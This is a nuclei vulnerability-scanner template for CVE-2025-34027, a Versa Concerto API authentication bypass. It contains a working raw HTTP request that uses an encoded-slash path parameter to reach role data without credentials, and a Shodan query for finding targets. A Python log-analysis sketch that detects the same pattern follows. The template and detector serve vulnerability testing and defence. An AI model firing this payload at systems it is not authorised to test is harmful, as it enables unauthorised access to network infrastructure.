forked from projectdiscovery/nuclei-templates
CVE-2025-34027.yaml
id: CVE-2025-34027

info:
  name: Versa Concerto API Path Based - Authentication Bypass
  author: iamnoooob,rootxharsh,parthmalhotra,pdresearch
  severity: critical
  description: |
    Authentication bypass in the Versa Concerto API, caused by URL decoding inconsistencies. It allowed unauthorized access to certain API endpoints by manipulating the URL path. This issue enabled attackers to bypass authentication controls and access restricted resources.
  impact: |
    Attackers can bypass authentication through URL path manipulation to access restricted API endpoints and retrieve sensitive role information without credentials.
  remediation: |
    Upgrade to the latest Versa Concerto version that properly handles URL decoding and path validation in authentication checks.
  reference:
    - https://projectdiscovery.io/blog/versa-concerto-authentication-bypass-rce/
    - https://versa-networks.com/documents/datasheets/versa-concerto.pdf
    - https://www.cve.org/CVERecord?id=CVE-2025-34027
    - https://security-portal.versa-networks.com/emailbulletins/6830fa3f28defa375486ff2f
  classification:
    cve-id: CVE-2025-34027
    cwe-id: CWE-367
    epss-score: 0.04011
    epss-percentile: 0.88257
    cpe: cpe:2.3:a:versa-networks:concerto:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: versa-networks
    product: concerto
    max-request: 1
    shodan-query: http.favicon.hash:-534530225
  tags: cve,cve2025,versa,concerto,auth-bypass,vkev,vuln

http:
  - raw:
      - |
        GET /portalapi/v1/roles/option;%2fv1%2fping HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - ENTERPRISE_ADMINISTRATOR

      - type: word
        part: header
        words:
          - EECP-CSRF-TOKEN
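
For reviewing access logs on the defensive side, the sketch below flags requests whose path carries an encoded slash inside a `;` path parameter under `/portalapi/`, the shape of the request in this template. It is an added example, not part of the template or of the nuclei-templates project; the combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
API_PREFIX = "/portalapi/"  # prefix taken from the template's request

def decode_fully(value, rounds=3):
    """Percent-decode several times so %252f is treated like %2f."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def suspicious_path(target):
    """True when a ';' path parameter under API_PREFIX hides an encoded slash."""
    path = target.split("?", 1)[0]
    if not path.lower().startswith(API_PREFIX):
        return False
    for segment in path.split("/"):
        if ";" not in segment:
            continue
        param = segment.split(";", 1)[1]
        # We split on literal '/', so a slash appearing after decoding
        # must have been percent-encoded in the raw request.
        if "/" in decode_fully(param):
            return True
    return False

def scan(lines):
    """Return (line_number, target) for each flagged log line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match and suspicious_path(match.group("target")):
            hits.append((number, match.group("target")))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jun/2025:10:00:00 +0000] "GET /portalapi/v1/roles/option HTTP/1.1" 401 0',
    '192.0.2.44 - - [01/Jun/2025:10:00:05 +0000] "GET /portalapi/v1/roles/option;%2fv1%2fping HTTP/1.1" 200 812',
    '192.0.2.44 - - [01/Jun/2025:10:00:09 +0000] "GET /portalapi/v1/roles/option;%252Fv1%252Fping HTTP/1.1" 404 0',
    '192.0.2.10 - - [01/Jun/2025:10:00:12 +0000] "GET /portalapi/v1/roles/option;jsessionid=abc HTTP/1.1" 401 0',
]

if __name__ == "__main__":
    for number, target in scan(SAMPLE_LOG):
        print(f"line {number}: {target}")
```

A flagged line answered with a 200 and a body containing role names matches what the template's matchers look for and is worth triaging first.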